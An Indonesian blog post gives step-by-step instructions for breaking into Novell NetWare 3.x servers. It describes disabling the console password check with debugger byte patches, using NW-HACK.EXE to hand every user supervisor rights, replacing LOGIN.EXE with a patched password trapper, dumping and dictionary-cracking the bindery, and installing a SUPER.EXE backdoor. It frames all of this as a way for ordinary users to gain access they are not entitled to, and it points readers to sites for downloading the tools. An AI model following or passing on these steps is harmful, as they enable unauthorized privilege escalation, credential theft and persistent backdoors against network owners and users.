19
Des
07

HACKING NOVELL NETWARE

Novell Netware, sebagai salah satu Network Operating System yang banyak
dipakai di Indonesia, merupakan OS yang menarik untuk dipelajari, karena
kedekatannya dengan DOS yang umumnya sudah dikenal pemakai komputer di
Indonesia.

Sayang sekali sebagai user biasa kita tidak bisa menggunakan feature-feature
tertentu yang hanya bisa di akses oleh SUPER USER (SUPERVISOR dalam istilah
Novell Netware).

Berikut ini beberapa trik yang bisa digunakan untuk mendapatkan akses
SUPERVISOR tersebut.

Sebagai tambahan semua tutorial ini sudah diuji penulis di Novel Netware 3.11
dan 3.12

1. BAGAIMANA CARA SAYA MENDAPAT SUPERVISOR AKSES?

Ada beberapa kemungkinan yang mungkin anda punyai:
A. Anda punya akses fisik ke Server
B. Anda tidak punya akses fisik ke Server tapi punya account/login name

A. Anda punya akses fisik ke Server
Biasanya orang yang punya akses fisik ke Server (bisa menggunakan console
server) adalah orang yang dipercaya untuk Maintenance System.
Trik berikut ini biasanya saya lakukan kalau Supervisornya tidak berada
ditempat saat kita memerlukan passwordnya atau Supervisornya lupa passwordnya
(jangan tertawa, banyak yang begini, karena akses Supervisor kadang dipakai
sampai mereka lupa sendiri).

Berikut hacknya:

Cat: Yg didalam [ ] adalah tombol keyboard yg harus ditekan.
Yg didalam { } adalah keterangan

1. Tekan [Left Shift][Right Shift][Alt][Esc] secara bersamaan {Debugger Mode}
2. Ketik: d VerifyPassword 6 [Enter] {Catat 6 byte yg keluar sebagai hasilnya}.
3. Ketik: c VerifyPassword=B8 0 0 0 0 C3 [Enter] {Matikan cek password}
4. Ketik: g [Enter] {Lakukan perubahan}

Sesudah proses ini dilakukan anda dapat login sebagai Supervisor tanpa perlu
mengisi password.

Untuk mengembalikan cek password:
1. Tekan [Left Shift][Right Shift][Alt][Esc] secara bersamaan {Debugger Mode}
2. Ketik: c VerifyPassword=xx xx xx xx xx xx [Enter] {xx=6 bytes yg dicatat}
3. Ketik: g [Enter] {Lakukan perubahan}

Atau kalau mau mudahnya (dan dimungkinkan) down servernya kemudian restart
lagi, password check akan normal kembali, karena perubahan password check
cuma di memory.

B. Anda tidak punya akses fisik ke Server tapi punya account/login name
(meskipun hanya guest account).

Cara yang paling mudah adalah menggunakan program NW-HACK.EXE, kerja
program ini sebagai berikut: 

1. Jika SUPERVISOR sudah login (cek dgn USERLIST) jalankan program ini.
Password Supervisor akan diubah menjadi SUPER_HACKER (Cool name eh?)
2. Dan setiap account dalam server tersebut akan menjadi SUPERVISOR Equivalent
yang berarti semua user setara dengan SUPERVISOR.
3. Kita harus memasang BACKDOOR sesudah mendapatkan akses seperti ini (karena
kalau Supervisornya tahu, pasti dia akan mengubah status semua user yang
sudah jadi Supervisor Equivalent ke status normal).

2. BAGAIMANA MENDAPATKAN PASSWORD LAIN DI NOVELL NETWARE?

Password Trapper terbaik yang pernah saya kenal adalah dua sekawan LOGIN.EXE
(hasil patch dari Hacker Belanda bernama itsme) dan PROP.EXE
Untuk bisa menanam Password Trapper ini 

1. Kita harus mendapat SUPERVISOR akses dulu,
2. Kalau supervisor akses sudah didapat, ganti file LOGIN.EXE di directory
SYS:LOGIN dengan file LOGIN.EXE hasil patch, jangan lupa mengganti
flag/attributnya menjadi SRO.
3. Sesudah file LOGIN.EXE diganti, masih sebagai Supervisor jalankan file
PROP.EXE dengan option -C [PROP -C] untuk membuat bindery property baru
(sebagai tempat password yang di trap).
4. Sesudah satu minggu atau satu bulan kemudian coba cek password panenan
kamu dengan perintah PROP -R atau boleh juga di pipe seperti
PROP -R > NAMAFILE.
5. Untuk menjalankan PROP.EXE kita tidak perlu akses Supervisor, cukup user
biasa saja, bahkan tidak perlu login sama sekali yang penting IPX dan
NETX (atau LSL, IPXODI dan VLM, whatever) sudah dijalankan (saran saya
siapkan PROP.EXE di disket kemudian jalankan dari disket).

4. BAGAIMANA MENDAPATKAN SEMUA PASSWORD DI NOVELL NETWARE?

1. Sebagai SUPERVISOR masuk ke directory SYS:SYSTEM, kemudian ketik BINDFIX.
2. Jawab semua pertanyaan dengan Yes, kalau sudah selesai,
3. Copy 3 (tiga) file berextension .OLD (cari tahu sendiri filenya) ke disket.
4. Gunakan program BINDERY.EXE sebagai berikut:
BINDERY ETC > PASSWORD
5. Kemudian crack hasil di file PASSWORD menggunakan BINCRACK.EXE plus
FILEDICTIONARY (kumpulan password) sebagai berikut :
BINCRACK PASSWORD FILEDICTIONARY > HASILPASS

5. BAGAIMANA MEMBUAT BACKDOOR?

Ada satu file bernama SUPER.EXE yang sering dipakai untuk keperluan ini,
dengan file ini kita bisa mendapatkan Supervisor Equivalent (dengan
menggunakan login user biasa) kapan saja kita inginkan.
Tapi ini harus diset lebih dahulu, dan untuk bisa setting backdoor ini, kita
harus mendapatkan akses Supervisor dulu (utility ini memang untuk Supervisor,
supaya sang Supervisor bisa mengganti status nya sebagai user biasa atau
supervisor sesuai kebutuhan).
Misalnya anda punya login dengan nama KECOAK, dan anda ingin anda bisa
mengganti status anda sebagai normal user ataupun supervisor kapan saja anda
suka.
1. Login sebagai Supervisor
2. Jalankan program SYSCON
3. Set equivalent user KECOAK sebagai SUPERVISOR
4. Tutup/Exit program SYSCON
5. Login sebagai KECOAK
6. Jalankan program SUPER.EXE sebagai berikut: SUPER +
Sekarang Toggle Supervisor Equivalent untuk KECOAK sudah ON
7. Login sebagai SUPERVISOR
8. Jalankan program SYSCON
9. Hapus equivalent SUPERVISOR user KECOAK
10. Tutup/Exit program SYSCON
11. Untuk selanjutnya untuk mengaktifkan Supervisor Equivalent, anda tinggal
login sebagai KECOAK kemudian mengetik SUPER +, untuk menonaktifkan
Supervisor Equivalent ketiklah: SUPER -
(Heheheheh ... Ksatria Kecoak Baja Hitam - Berubah!!!)

6. DARIMANA SAJA SAYA BISA MENDAPAT SEMUA UTILITY YANG DISEBUT DIATAS?

Internet Search Engine adalah sumber yang hampir tidak terbatas, ketik
NAMAFILE yang anda inginkan dan anda akan mendapatkannya.
Beberapa search engine yang baik adalah:
http://www.altavista.digital.com
http://www.excite.com
Dan yang terbaik untuk hacker:
http://astalavista.box.sk

0 Responses to “HACKING NOVELL NETWARE”



  1. Tinggalkan sebuah Komentar

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s


%d blogger menyukai ini: